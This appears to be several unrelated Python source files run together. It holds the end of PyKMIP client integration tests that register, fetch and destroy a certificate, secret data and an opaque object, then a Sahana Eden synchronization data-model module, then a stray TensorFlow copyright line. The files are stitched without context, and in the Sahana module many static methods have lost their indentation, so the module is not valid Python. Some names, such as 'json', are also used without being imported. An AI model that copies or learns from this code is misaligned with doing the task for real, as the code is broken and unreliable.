        # Certificate encoding obtained from Section 13.2 of the KMIP 1.1 test
        # documentation.
        cert = objects.X509Certificate(
            (b'\x30\x82\x03\x12\x30\x82\x01\xFA\xA0\x03\x02\x01\x02\x02\x01'
             b'\x01\x30\x0D\x06\x09\x2A\x86\x48\x86\xF7\x0D\x01\x01\x05\x05'
             b'\x00\x30\x3B\x31\x0B\x30\x09\x06\x03\x55\x04\x06\x13\x02\x55'
             b'\x53\x31\x0D\x30\x0B\x06\x03\x55\x04\x0A\x13\x04\x54\x45\x53'
             b'\x54\x31\x0E\x30\x0C\x06\x03\x55\x04\x0B\x13\x05\x4F\x41\x53'
             b'\x49\x53\x31\x0D\x30\x0B\x06\x03\x55\x04\x03\x13\x04\x4B\x4D'
             b'\x49\x50\x30\x1E\x17\x0D\x31\x30\x31\x31\x30\x31\x32\x33\x35'
             b'\x39\x35\x39\x5A\x17\x0D\x32\x30\x31\x31\x30\x31\x32\x33\x35'
             b'\x39\x35\x39\x5A\x30\x3B\x31\x0B\x30\x09\x06\x03\x55\x04\x06'
             b'\x13\x02\x55\x53\x31\x0D\x30\x0B\x06\x03\x55\x04\x0A\x13\x04'
             b'\x54\x45\x53\x54\x31\x0E\x30\x0C\x06\x03\x55\x04\x0B\x13\x05'
             b'\x4F\x41\x53\x49\x53\x31\x0D\x30\x0B\x06\x03\x55\x04\x03\x13'
             b'\x04\x4B\x4D\x49\x50\x30\x82\x01\x22\x30\x0D\x06\x09\x2A\x86'
             b'\x48\x86\xF7\x0D\x01\x01\x01\x05\x00\x03\x82\x01\x0F\x00\x30'
             b'\x82\x01\x0A\x02\x82\x01\x01\x00\xAB\x7F\x16\x1C\x00\x42\x49'
             b'\x6C\xCD\x6C\x6D\x4D\xAD\xB9\x19\x97\x34\x35\x35\x77\x76\x00'
             b'\x3A\xCF\x54\xB7\xAF\x1E\x44\x0A\xFB\x80\xB6\x4A\x87\x55\xF8'
             b'\x00\x2C\xFE\xBA\x6B\x18\x45\x40\xA2\xD6\x60\x86\xD7\x46\x48'
             b'\x34\x6D\x75\xB8\xD7\x18\x12\xB2\x05\x38\x7C\x0F\x65\x83\xBC'
             b'\x4D\x7D\xC7\xEC\x11\x4F\x3B\x17\x6B\x79\x57\xC4\x22\xE7\xD0'
             b'\x3F\xC6\x26\x7F\xA2\xA6\xF8\x9B\x9B\xEE\x9E\x60\xA1\xD7\xC2'
             b'\xD8\x33\xE5\xA5\xF4\xBB\x0B\x14\x34\xF4\xE7\x95\xA4\x11\x00'
             b'\xF8\xAA\x21\x49\x00\xDF\x8B\x65\x08\x9F\x98\x13\x5B\x1C\x67'
             b'\xB7\x01\x67\x5A\xBD\xBC\x7D\x57\x21\xAA\xC9\xD1\x4A\x7F\x08'
             b'\x1F\xCE\xC8\x0B\x64\xE8\xA0\xEC\xC8\x29\x53\x53\xC7\x95\x32'
             b'\x8A\xBF\x70\xE1\xB4\x2E\x7B\xB8\xB7\xF4\xE8\xAC\x8C\x81\x0C'
             b'\xDB\x66\xE3\xD2\x11\x26\xEB\xA8\xDA\x7D\x0C\xA3\x41\x42\xCB'
             b'\x76\xF9\x1F\x01\x3D\xA8\x09\xE9\xC1\xB7\xAE\x64\xC5\x41\x30'
             b'\xFB\xC2\x1D\x80\xE9\xC2\xCB\x06\xC5\xC8\xD7\xCC\xE8\x94\x6A'
             b'\x9A\xC9\x9B\x1C\x28\x15\xC3\x61\x2A\x29\xA8\x2D\x73\xA1\xF9'
             b'\x93\x74\xFE\x30\xE5\x49\x51\x66\x2A\x6E\xDA\x29\xC6\xFC\x41'
             b'\x13\x35\xD5\xDC\x74\x26\xB0\xF6\x05\x02\x03\x01\x00\x01\xA3'
             b'\x21\x30\x1F\x30\x1D\x06\x03\x55\x1D\x0E\x04\x16\x04\x14\x04'
             b'\xE5\x7B\xD2\xC4\x31\xB2\xE8\x16\xE1\x80\xA1\x98\x23\xFA\xC8'
             b'\x58\x27\x3F\x6B\x30\x0D\x06\x09\x2A\x86\x48\x86\xF7\x0D\x01'
             b'\x01\x05\x05\x00\x03\x82\x01\x01\x00\xA8\x76\xAD\xBC\x6C\x8E'
             b'\x0F\xF0\x17\x21\x6E\x19\x5F\xEA\x76\xBF\xF6\x1A\x56\x7C\x9A'
             b'\x13\xDC\x50\xD1\x3F\xEC\x12\xA4\x27\x3C\x44\x15\x47\xCF\xAB'
             b'\xCB\x5D\x61\xD9\x91\xE9\x66\x31\x9D\xF7\x2C\x0D\x41\xBA\x82'
             b'\x6A\x45\x11\x2F\xF2\x60\x89\xA2\x34\x4F\x4D\x71\xCF\x7C\x92'
             b'\x1B\x4B\xDF\xAE\xF1\x60\x0D\x1B\xAA\xA1\x53\x36\x05\x7E\x01'
             b'\x4B\x8B\x49\x6D\x4F\xAE\x9E\x8A\x6C\x1D\xA9\xAE\xB6\xCB\xC9'
             b'\x60\xCB\xF2\xFA\xE7\x7F\x58\x7E\xC4\xBB\x28\x20\x45\x33\x88'
             b'\x45\xB8\x8D\xD9\xAE\xEA\x53\xE4\x82\xA3\x6E\x73\x4E\x4F\x5F'
             b'\x03\xB9\xD0\xDF\xC4\xCA\xFC\x6B\xB3\x4E\xA9\x05\x3E\x52\xBD'
             b'\x60\x9E\xE0\x1E\x86\xD9\xB0\x9F\xB5\x11\x20\xC1\x98\x34\xA9'
             b'\x97\xB0\x9C\xE0\x8D\x79\xE8\x13\x11\x76\x2F\x97\x4B\xB1\xC8'
             b'\xC0\x91\x86\xC4\xD7\x89\x33\xE0\xDB\x38\xE9\x05\x08\x48\x77'
             b'\xE1\x47\xC7\x8A\xF5\x2F\xAE\x07\x19\x2F\xF1\x66\xD1\x9F\xA9'
             b'\x4A\x11\xCC\x11\xB2\x7E\xD0\x50\xF7\xA2\x7F\xAE\x13\xB2\x05'
             b'\xA5\x74\xC4\xEE\x00\xAA\x8B\xD6\x5D\x0D\x70\x57\xC9\x85\xC8'
             b'\x39\xEF\x33\x6A\x44\x1E\xD5\x3A\x53\xC6\xB6\xB6\x96\xF1\xBD'
             b'\xEB\x5F\x7E\xA8\x11\xEB\xB2\x5A\x7F\x86'))
        uid = self.client.register(cert)
        self.assertIsInstance(uid, six.string_types)
        try:
            result = self.client.get(uid)
            self.assertIsInstance(result, objects.X509Certificate)
            self.assertEqual(
                result, cert, "expected {0}\nobserved {1}".format(
                    result, cert))
        finally:
            self.client.destroy(uid)
            self.assertRaises(
                exceptions.KmipOperationFailure, self.client.get, uid)
            self.assertRaises(
                exceptions.KmipOperationFailure, self.client.destroy, uid)

    def test_secret_data_register_get_destroy(self):
        """
        Test that the ProxyKmipClient can register, retrieve, and destroy a
        secret.
        """
        # Secret encoding obtained from Section 3.1.5 of the KMIP 1.1 test
        # documentation.
        secret = objects.SecretData(
            (b'\x53\x65\x63\x72\x65\x74\x50\x61\x73\x73\x77\x6F\x72\x64'),
            enums.SecretDataType.PASSWORD)
        uid = self.client.register(secret)
        self.assertIsInstance(uid, six.string_types)
        try:
            result = self.client.get(uid)
            self.assertIsInstance(result, objects.SecretData)
            self.assertEqual(
                result, secret, "expected {0}\nobserved {1}".format(
                    result, secret))
        finally:
            self.client.destroy(uid)
            self.assertRaises(
                exceptions.KmipOperationFailure, self.client.get, uid)
            self.assertRaises(
                exceptions.KmipOperationFailure, self.client.destroy, uid)

    def test_opaque_object_register_get_destroy(self):
        """
        Test that the ProxyKmipClient can register, retrieve, and destroy an
        opaque object.
        """
        # Object encoding obtained from Section 3.1.5 of the KMIP 1.1 test
        # documentation.
        obj = objects.OpaqueObject(
            b'\x53\x65\x63\x72\x65\x74\x50\x61\x73\x73\x77\x6F\x72\x64',
            enums.OpaqueDataType.NONE)
        uid = self.client.register(obj)
        self.assertIsInstance(uid, six.string_types)
        try:
            result = self.client.get(uid)
            self.assertIsInstance(result, objects.OpaqueObject)
            self.assertEqual(
                result, obj, "expected {0}\nobserved {1}".format(result, obj))
        finally:
            self.client.destroy(uid)
            self.assertRaises(
                exceptions.KmipOperationFailure, self.client.get, uid)
            self.assertRaises(
                exceptions.KmipOperationFailure, self.client.destroy, uid)
| |
# -*- coding: utf-8 -*-
""" Sahana Eden Synchronization
@copyright: 2009-2013 (c) Sahana Software Foundation
@license: MIT
Permission is hereby granted, free of charge, to any person
obtaining a copy of this software and associated documentation
files (the "Software"), to deal in the Software without
restriction, including without limitation the rights to use,
copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the
Software is furnished to do so, subject to the following
conditions:
The above copyright notice and this permission notice shall be
included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES
OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
OTHER DEALINGS IN THE SOFTWARE.
"""
__all__ = ["SyncDataModel",
"sync_rheader",
"sync_now",
"sync_job_reset"
]
from gluon import *
from gluon.dal import Row
from gluon.storage import Storage
from ..s3 import *
# =============================================================================
class SyncDataModel(S3Model):
    """ Data model for repository synchronization (sync_* tables) """

    # Tables defined by this model; S3Model uses this list for
    # lazy table instantiation.
    names = ["sync_config",
             "sync_status",
             "sync_repository",
             "sync_task",
             "sync_resource_filter",
             "sync_job",
             "sync_log"
             ]
    def model(self):
        """
        Define the synchronization tables

        @returns: an (empty) Storage - this model exports no global names
        """

        T = current.T
        db = current.db
        # NOTE(review): request appears to be unused below - verify before removing
        request = current.request
        s3 = current.response.s3
        messages = current.messages
        UNKNOWN_OPT = messages.UNKNOWN_OPT
        NONE = messages["NONE"]

        crud_strings = s3.crud_strings
        define_table = self.define_table
        add_components = self.add_components
        configure = self.configure
        set_method = self.set_method

        # All sync timestamps are stored/represented in UTC
        s3_datetime_represent = lambda dt: \
                                S3DateTime.datetime_represent(dt, utc=True)

        # -------------------------------------------------------------------------
        # Configuration
        # -------------------------------------------------------------------------
        tablename = "sync_config"
        define_table(tablename,
                     Field("proxy",
                           label=T("Proxy Server URL"),
                           requires=IS_EMPTY_OR(IS_URL(mode="generic"))),
                     *s3_meta_fields())

        # Field configuration
        # @todo: make in-line
        table = db[tablename]
        table.uuid.readable = True
        table.uuid.label = "UUID"
        table.uuid.comment = DIV(_class="tooltip",
                                 _title="%s|%s" % (
                                    T("UUID"),
                                    T("Unique identifier which THIS repository identifies itself with when sending synchronization requests.")))
        table.proxy.comment = DIV(_class="tooltip",
                                  _title="%s|%s" % (
                                    T("Proxy Server URL"),
                                    T("URL of the default proxy server to connect to remote repositories (if required). If only some of the repositories require the use of a proxy server, you can configure this in the respective repository configurations.")))

        # CRUD Strings
        crud_strings[tablename] = Storage(
            title_display = T("Synchronization Settings"),
            title_update = T("Edit Synchronization Settings"),
            msg_record_modified = T("Synchronization settings updated"))

        # Resource Configuration
        # Singleton record (id=1): neither insertable nor deletable
        configure(tablename,
                  insertable=False,
                  deletable=False,
                  update_next=URL(c="sync", f="config", args=["1", "update"]))

        # -------------------------------------------------------------------------
        # Status
        # -------------------------------------------------------------------------
        tablename = "sync_status"
        define_table(tablename,
                     Field("running", "boolean",
                           default=False,
                           readable=False,
                           writable=False),
                     Field("manual", "boolean",
                           default=False,
                           readable=False,
                           writable=False),
                     Field("timestmp", "datetime",
                           readable=False,
                           writable=False))

        # -------------------------------------------------------------------------
        # Repository
        # -------------------------------------------------------------------------
        sync_repository_types = {
            "eden": "Sahana Eden",
            "ccrm": "CiviCRM",
            "wrike": "Wrike",
            "mcb": "Mariner CommandBridge",
        }

        tablename = "sync_repository"
        define_table(tablename,
                     Field("name", length=64, notnull=True,
                           comment = DIV(_class="tooltip",
                                         _title="%s|%s" % (
                                            T("Repository Name"),
                                            T("Name of the repository (for you own reference)"))),
                           ),
                     Field("apitype",
                           label=T("Repository Type"),
                           requires = IS_IN_SET(sync_repository_types),
                           default = "eden",
                           represent = lambda opt: \
                                       NONE if not opt else \
                                       sync_repository_types.get(opt, NONE),
                           ),
                     Field("url",
                           label="URL",
                           requires = IS_EMPTY_OR(
                                        IS_NOT_IN_DB(db, "sync_repository.url")),
                           comment = DIV(_class="tooltip",
                                         _title="%s|%s" % (
                                            T("Repository Base URL"),
                                            T("Base URL of the remote Sahana Eden instance including application path, e.g. http://www.example.org/eden"))),
                           ),
                     Field("username",
                           comment = DIV(_class="tooltip",
                                         _title="%s|%s" % (
                                            T("Username"),
                                            T("Username to use for authentication at the remote site."))),
                           ),
                     Field("password", "password",
                           comment = DIV(_class="tooltip",
                                         _title="%s|%s" % (
                                            T("Password"),
                                            T("Password to use for authentication at the remote site."))),
                           ),
                     Field("client_id",
                           label = T("Client ID"),
                           comment = DIV(_class="tooltip",
                                         _title="%s|%s" % (
                                            T("Client ID"),
                                            T("The client ID to use for authentication at the remote site (if required for this type of repository)."))),
                           ),
                     Field("client_secret", "password",
                           label = T("Client Secret"),
                           comment = DIV(_class="tooltip",
                                         _title="%s|%s" % (
                                            T("Client Secret"),
                                            T("The client secret to use for authentication at the remote site (if required for this type of repository)."))),
                           ),
                     Field("site_key",
                           label = T("Site Key"),
                           comment = DIV(_class="tooltip",
                                         _title="%s|%s" % (
                                            T("Site Key"),
                                            T("Site Key which this site uses to authenticate at the remote site (if required for this type of repository)."))),
                           ),
                     Field("refresh_token",
                           readable = False,
                           writable = False,
                           ),
                     Field("proxy",
                           label=T("Proxy Server URL"),
                           requires=IS_EMPTY_OR(IS_URL(mode="generic")),
                           comment = DIV(_class="tooltip",
                                         _title="%s|%s" % (
                                            T("Proxy Server URL"),
                                            T("URL of the proxy server to connect to the repository (leave empty for default proxy)"))),
                           ),
                     Field("last_status",
                           readable=False,
                           writable=False,
                           label=T("Last status"),
                           ),
                     Field("accept_push", "boolean",
                           represent = s3_yes_no_represent,
                           default=False,
                           label=T("Accept Push"),
                           comment = DIV(_class="tooltip",
                                         _title="%s|%s" % (
                                            T("Accept Push"),
                                            T("Accept unsolicited data transmissions from the repository."))),
                           ),
                     # Virtual fields (computed from sync_task records)
                     Field.Method("last_pull_time",
                                  self.sync_repository_last_pull_time),
                     Field.Method("last_push_time",
                                  self.sync_repository_last_push_time),
                     *s3_meta_fields())

        # CRUD Strings
        ADD_REPOSITORY = T("Create Repository")
        crud_strings[tablename] = Storage(
            label_create = ADD_REPOSITORY,
            title_display = T("Repository Configuration"),
            title_list = T("Repositories"),
            title_update = T("Edit Repository Configuration"),
            label_list_button = T("List Repositories"),
            msg_record_created = T("Repository configured"),
            msg_record_modified = T("Repository configuration updated"),
            msg_record_deleted = T("Repository configuration deleted"),
            msg_list_empty = T("No repositories configured"))

        # Resource Configuration
        configure(tablename,
                  list_fields=["name",
                               "uuid",
                               "accept_push",
                               (T("Last Pull"), "last_pull_time"),
                               (T("Last Push"), "last_push_time"),
                               ],
                  onaccept=self.sync_repository_onaccept,
                  ondelete=self.sync_repository_ondelete,
                  create_next=URL(c="sync",
                                  f="repository",
                                  args=["[id]", "task"],
                                  ),
                  update_next=URL(c="sync",
                                  f="repository",
                                  args=["[id]"],
                                  )
                  )

        set_method("sync", "repository", method="now", action=sync_now)

        # Reusable Fields
        repository_id = S3ReusableField("repository_id", "reference %s" % tablename,
                                        requires = IS_ONE_OF(db,
                                                             "sync_repository.id",
                                                             "%(name)s"),
                                        represent = self.sync_repository_represent,
                                        label = T("Repository"))

        # Components
        add_components(tablename,
                       sync_task="repository_id",
                       sync_log="repository_id",
                       #sync_conflict="repository_id",
                       **{# Scheduler Jobs
                          S3Task.TASK_TABLENAME: {"name": "job",
                                                  "joinby": "repository_id",
                                                  "link": "sync_job",
                                                  "key": "scheduler_task_id",
                                                  "actuate": "replace",
                                                  },
                         }
                       )

        # -------------------------------------------------------------------------
        # Task
        # -------------------------------------------------------------------------
        # Synchronization mode
        sync_mode = {
            1: T("pull"),           # pull only
            2: T("push"),           # push only
            3: T("pull and push"),  # pull & push
            4: T("none")            # do not synchronize this resource
        }

        # Strategy (allowed import methods)
        sync_strategy = S3ImportItem.METHOD

        sync_strategy_represent = lambda opt: opt and \
                                    ", ".join([o for o in sync_strategy.values()
                                               if o in opt]) or NONE

        # Update method
        sync_update_method = {
            1: T("update"),         # update the existing record
            2: T("replace"),        # replace the existing record
        }

        # Update/conflict resolution policy
        sync_policies = S3ImportItem.POLICY
        sync_policy = {
            sync_policies.OTHER: T("always update"),
            sync_policies.NEWER: T("update if newer"),
            sync_policies.MASTER: T("update if master"),
            sync_policies.THIS: T("never update")
        }

        sync_policy_represent = lambda opt: \
                                opt and sync_policy.get(opt, UNKNOWN_OPT) or NONE

        tablename = "sync_task"
        define_table(tablename,
                     repository_id(),
                     Field("resource_name",
                           notnull=True),
                     Field("last_pull", "datetime",
                           readable=True,
                           writable=False,
                           label=T("Last pull on")),
                     Field("last_push", "datetime",
                           readable=True,
                           writable=False,
                           label=T("Last push on")),
                     Field("mode", "integer",
                           requires = IS_IN_SET(sync_mode,
                                                zero=None),
                           default = 3,
                           label = T("Mode"),
                           represent = lambda opt: \
                                       sync_mode.get(opt, NONE)),
                     Field("strategy", "list:string",
                           requires = IS_IN_SET(sync_strategy.values(),
                                                multiple=True,
                                                zero=None),
                           default = sync_strategy.values(),
                           label = T("Strategy"),
                           represent = sync_strategy_represent,
                           widget = CheckboxesWidgetS3.widget),
                     Field("update_method", "integer",
                           # hide while not implemented
                           readable=False,
                           writable=False,
                           requires = IS_IN_SET(sync_update_method,
                                                zero=None),
                           default = 1,
                           label = T("Update Method"),
                           represent = lambda opt: \
                                       sync_update_method.get(opt,
                                                              NONE)),
                     Field("update_policy",
                           requires = IS_IN_SET(sync_policies,
                                                zero=None),
                           default = sync_policies.NEWER,
                           label = T("Update Policy"),
                           represent = sync_policy_represent),
                     Field("conflict_policy",
                           requires = IS_IN_SET(sync_policies,
                                                zero=None),
                           default = sync_policies.NEWER,
                           label = T("Conflict Policy"),
                           represent = sync_policy_represent),
                     *s3_meta_fields())

        # Field configuration
        # @todo: make in-line
        table = db[tablename]
        table.resource_name.comment = DIV(_class="tooltip",
                                          _title="%s|%s" % (
                                            T("Resource Name"),
                                            T("Table name of the resource to synchronize")))
        table.mode.comment = DIV(_class="tooltip",
                                 _title="%s|%s" % (
                                    T("Synchronization mode"),
                                    T("How data shall be transferred")))
        table.strategy.comment = DIV(_class="tooltip",
                                     _title="%s|%s" % (
                                        T("Strategy"),
                                        T("Which methods to apply when importing data to the local repository")))
        table.update_method.comment = DIV(_class="tooltip",
                                          _title="%s|%s" % (
                                            T("Update Method"),
                                            T("How local records shall be updated")))
        table.update_policy.comment = DIV(_class="tooltip",
                                          _title="%s|%s" % (
                                            T("Update Policy"),
                                            T("Under which conditions local records shall be updated")))
        table.conflict_policy.comment = DIV(_class="tooltip",
                                            _title="%s|%s" % (
                                                T("Conflict Policy"),
                                                T("Under which condition a local record shall be updated if it also has been modified locally since the last synchronization")))

        # CRUD Strings
        ADD_TASK = T("Create Resource")
        crud_strings[tablename] = Storage(
            label_create = ADD_TASK,
            title_display = T("Resource Configuration"),
            title_list = T("Resources"),
            title_update = T("Edit Resource Configuration"),
            label_list_button = T("List Resources"),
            msg_record_created = T("Resource configured"),
            msg_record_modified = T("Resource configuration updated"),
            msg_record_deleted = T("Resource configuration deleted"),
            msg_list_empty = T("No resources configured yet"))

        # Resource Configuration
        configure(tablename,
                  create_onvalidation=self.sync_task_onvalidation)

        # Reusable Field
        task_represent = self.sync_task_represent
        task_id = S3ReusableField("task_id", "reference %s" % tablename,
                                  requires = IS_ONE_OF(db,
                                                       "sync_task.id",
                                                       task_represent),
                                  represent = task_represent,
                                  label = T("Task"))

        # Components
        add_components(tablename,
                       sync_resource_filter="task_id",
                       )

        # -------------------------------------------------------------------------
        # Filters
        # -------------------------------------------------------------------------
        tablename = "sync_resource_filter"
        define_table(tablename,
                     task_id(),
                     Field("tablename",
                           label = T("Table"),
                           requires = IS_NOT_EMPTY()),
                     Field("filter_string",
                           label = T("Filter"),
                           requires = IS_NOT_EMPTY()),
                     *s3_meta_fields())

        # Filter changes reset last_push of the task (see onaccept handler)
        onaccept = self.sync_resource_filter_onaccept
        configure(tablename,
                  list_fields = ["id",
                                 "task_id$repository_id",
                                 "task_id$resource_name",
                                 "tablename",
                                 "filter_string"],
                  onaccept = onaccept,
                  ondelete = onaccept)

        # -------------------------------------------------------------------------
        # Job
        # -------------------------------------------------------------------------
        tablename = "sync_job"
        define_table(tablename,
                     repository_id(),
                     s3.scheduler_task_id(),
                     *s3_meta_fields())

        # CRUD Strings
        ADD_JOB = T("Create Job")
        crud_strings[tablename] = Storage(
            label_create = ADD_JOB,
            title_display = T("Synchronization Job"),
            title_list = T("Synchronization Schedule"),
            title_update = T("Edit Job"),
            label_list_button = T("List Jobs"),
            msg_record_created = T("Job added"),
            msg_record_modified = T("Job updated"),
            msg_record_deleted = T("Job deleted"),
            msg_list_empty = T("No jobs configured yet"),
            msg_no_match = T("No jobs configured"))

        # Resource Configuration
        set_method("sync", "repository",
                   component_name="job",
                   method="reset",
                   action=sync_job_reset)

        # -------------------------------------------------------------------------
        # Log
        # -------------------------------------------------------------------------
        tablename = "sync_log"
        define_table(tablename,
                     Field("timestmp", "datetime",
                           represent=s3_datetime_represent,
                           label=T("Date/Time")),
                     repository_id(),
                     Field("resource_name"),
                     # Synchronization mode: PULL/PUSH, IN/OUT
                     Field("mode"),
                     Field("action"),
                     Field("result"),
                     Field("remote", "boolean",
                           default=False,
                           label=T("Remote Error"),
                           represent=lambda opt: opt and T("yes") or ("no")),
                     Field("message", "text",
                           represent=s3_strip_markup),
                     *s3_meta_fields())

        # CRUD Strings
        crud_strings[tablename] = Storage(
            title_display = T("Log Entry"),
            title_list = T("Synchronization Log"),
            label_list_button = T("List All Entries"),
            msg_record_deleted = T("Log Entry Deleted"),
            msg_list_empty = T("No entries found"),
            msg_no_match = T("No entries found"))

        # Resource Configuration
        configure(tablename,
                  editable=False,
                  insertable=False,
                  deletable=True,
                  orderby="sync_log.timestmp desc")

        # ---------------------------------------------------------------------
        # Return global names to s3.*
        #
        return Storage()
# -------------------------------------------------------------------------
    def defaults(self):
        """ Safe defaults if module is disabled """

        # No names are exported by model() either, so nothing to substitute
        return Storage()
# -------------------------------------------------------------------------
@staticmethod
def sync_repository_represent(rid):
""" Repository representation """
db = current.db
rtable = current.s3db.sync_repository
repository = db(rtable.id == rid).select(rtable.name,
limitby=(0, 1)).first()
try:
return repository.name
except:
return current.messages.UNKNOWN_OPT
# -------------------------------------------------------------------------
@staticmethod
def sync_repository_last_pull_time(row):
""" Last pull synchronization date/time for this repository """
try:
repository_id = row["sync_repository.id"]
except AttributeError:
return "-"
table = current.s3db.sync_task
query = (table.repository_id == repository_id)
task = current.db(query).select(orderby=~table.last_pull,
limitby=(0,1)).first()
if task and task.last_pull:
return S3DateTime.datetime_represent(task.last_pull, utc=True)
else:
return current.T("never")
# -------------------------------------------------------------------------
@staticmethod
def sync_repository_last_push_time(row):
""" Last push synchronization date/time for this repository """
try:
repository_id = row["sync_repository.id"]
except AttributeError:
return "-"
table = current.s3db.sync_task
query = (table.repository_id == repository_id)
task = current.db(query).select(orderby=~table.last_push,
limitby=(0,1)).first()
if task and task.last_push:
return S3DateTime.datetime_represent(task.last_push, utc=True)
else:
return current.T("never")
# -------------------------------------------------------------------------
@staticmethod
def sync_task_represent(task_id):
""" Task representation """
s3db = current.s3db
ttable = s3db.sync_task
rtable = s3db.sync_repository
query = (ttable.id == task_id) & \
(rtable.id == ttable.repository_id)
db = current.db
task = db(query).select(ttable.resource_name,
rtable.name,
limitby=(0, 1)).first()
UNKNOWN_OPT = current.messages.UNKNOWN_OPT
if task:
repository = task[rtable.name] or UNKNOWN_OPT
resource = task[ttable.resource_name] or UNKNOWN_OPT
return "%s: %s" % (repository, resource)
else:
return UNKNOWN_OPT
# -------------------------------------------------------------------------
    @staticmethod
    def sync_repository_ondelete(row):
        """
        Cleanup after repository deletion

        @todo: use standard delete cascade
        @param row: the deleted sync_repository Row (only .id is used)
        """

        db = current.db
        s3db = current.s3db

        # Remove the URL to allow re-setup of the same repo
        # (url has a unique constraint, see model)
        rtable = s3db.sync_repository
        db(rtable.id == row.id).update(url=None)

        # Delete all resources in this repository
        # (soft-delete: only sets the deleted flag)
        ttable = s3db.sync_task
        db(ttable.repository_id == row.id).update(deleted=True)

        # Delete all jobs for this repository
        # @todo: remove scheduler_task entry as well
        jtable = s3db.sync_job
        db(jtable.repository_id == row.id).update(deleted=True)

        # Delete all pending conflicts of this repository
        #ctable = s3db.sync_conflict
        #db(ctable.repository_id == row.id).delete()

        # Delete all log entries for this repository (hard delete)
        ltable = s3db.sync_log
        db(ltable.repository_id == row.id).delete()

        return
# -------------------------------------------------------------------------
@staticmethod
def sync_repository_onaccept(form):
"""
Send registration request to the peer
"""
try:
repository_id = form.vars.id
except:
return
sync = current.sync
if repository_id:
rtable = current.s3db.sync_repository
query = (rtable.id == repository_id)
repository = current.db(query).select(limitby=(0, 1)).first()
if repository and repository.url:
from s3.s3sync import S3SyncRepository
connector = S3SyncRepository(repository)
success = connector.register()
if not success:
current.response.warning = \
current.T("Could not auto-register at the repository, please register manually.")
else:
current.response.confirmation = \
current.T("Successfully registered at the repository.")
return
# -------------------------------------------------------------------------
@staticmethod
def sync_task_onvalidation(form):
"""
Task record validation
"""
repository_id = form.vars.repository_id or \
current.request.post_vars.repository_id
resource_name = form.vars.resource_name
if repository_id and resource_name:
ttable = current.s3db.sync_task
query = (ttable.repository_id == repository_id) & \
(ttable.resource_name == resource_name) & \
(ttable.deleted != True)
row = current.db(query).select(ttable.id,
limitby=(0, 1)).first()
if row:
form.errors.resource_name = \
T("This resource is already configured for this repository")
# -------------------------------------------------------------------------
@staticmethod
def sync_resource_filter_onaccept(form):
"""
Reset last_push when adding/changing a filter
"""
db = current.db
s3db = current.s3db
ttable = s3db.sync_task
ftable = s3db.sync_resource_filter
if isinstance(form, Row):
filter_id = form.id
else:
try:
filter_id = form.vars.id
except:
return
row = db(ftable.id == filter_id).select(ftable.id,
ftable.deleted,
ftable.task_id,
ftable.deleted_fk,
limitby=(0, 1)).first()
if row:
task_id = None
if row.deleted:
try:
deleted_fk = json.loads(row.deleted_fk)
except:
return
if "task_id" in deleted_fk:
task_id = deleted_fk["task_id"]
else:
task_id = row.task_id
if task_id:
db(ttable.id == task_id).update(last_push=None)
return
# =============================================================================
def sync_rheader(r, tabs=None):
    """
    Synchronization resource headers

    @param r: the S3Request
    @param tabs: list of (title, method) tuples for the rheader tabs
    """

    # Fix: the original default tabs=[] was a mutable default argument,
    # and tabs.append() below mutated it across calls. Copy the caller's
    # list so it is never modified either.
    tabs = [] if tabs is None else list(tabs)

    if r.representation == "html":
        if r.tablename == "sync_repository":
            T = current.T
            repository = r.record
            if r.component and r.component_name == "log" and not r.component_id:
                purge_log = A(T("Remove all log entries"),
                              _href=r.url(method="delete"))
            else:
                purge_log = ""
            if repository:
                if repository.url:
                    # Manual sync is only possible with a configured URL
                    tabs.append((T("Manual Synchronization"), "now"))
                rheader_tabs = s3_rheader_tabs(r, tabs)
                rheader = DIV(TABLE(
                    TR(TH("%s: " % T("Name")),
                       repository.name,
                       TH(""),
                       purge_log),
                    TR(TH("URL: "),
                       repository.url,
                       TH(""),
                       ""),
                    ), rheader_tabs)
                return rheader
    return None
# =============================================================================
def sync_job_reset(r, **attr):
    """
    RESTful method to reset a job status from FAILED to QUEUED,
    for "Reset" action button

    @param r: the S3Request
    @param attr: controller options for the request
    """

    if r.interactive and r.component and r.component.alias == "job":
        job_id = r.component_id
        if job_id:
            S3Task.reset(job_id)
            current.session.confirmation = current.T("Job reactivated")

    r.component_id = None
    redirect(r.url(method=""))
# =============================================================================
def sync_now(r, **attr):
    """
    Manual synchronization of a repository

    @param r: the S3Request
    @param attr: controller options for the request
    """

    T = current.T
    auth = current.auth
    response = current.response
    rheader = attr.get("rheader", None)
    if rheader:
        rheader = rheader(r)

    output = dict(title=T("Manual Synchronization"), rheader=rheader)
    s3task = current.s3task
    sync = current.sync

    if not auth.s3_logged_in():
        auth.permission.fail()

    if r.interactive:
        if r.http in ("GET", "POST"):
            repository = r.record
            if not repository:
                r.error(404, current.ERROR.BAD_RECORD)
            form = FORM(TABLE(
                        TR(TD(T("Click 'Start' to synchronize with this repository now:"))),
                        TR(TD(INPUT(_type="submit", _value=T("Start"))))))
            if form.accepts(r.post_vars, current.session):
                # Run the synchronization as an asynchronous task
                # NOTE(review): "async" is a reserved word in Python >= 3.7;
                # this attribute access is only valid on Python 2 - confirm
                # before porting
                task_id = s3task.async("sync_synchronize",
                                       args = [repository.id],
                                       vars = dict(user_id=auth.user.id,
                                                   manual=True))
                if task_id is False:
                    # Scheduling failed
                    response.error = T("Could not initiate manual synchronization.")
                elif task_id is None:
                    # No scheduler running => task was executed inline
                    response.flash = T("Manual synchronization completed.")
                else:
                    # Task queued for background execution
                    sync.set_status(manual=True)
                    response.flash = T("Manual synchronization started in the background.")
        else:
            r.error(405, current.ERROR.BAD_METHOD)
    else:
        r.error(501, current.ERROR.BAD_FORMAT)

    # Choose what to show: live status message or the start form
    status = sync.get_status()
    if status.running:
        output.update(form=T("Synchronization currently active - refresh page to update status."))
    elif not status.manual:
        output.update(form=form)
    else:
        output.update(form=T("Manual synchronization scheduled - refresh page to update status."))

    response.view = "update.html"
    return output
# END =========================================================================
| |
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
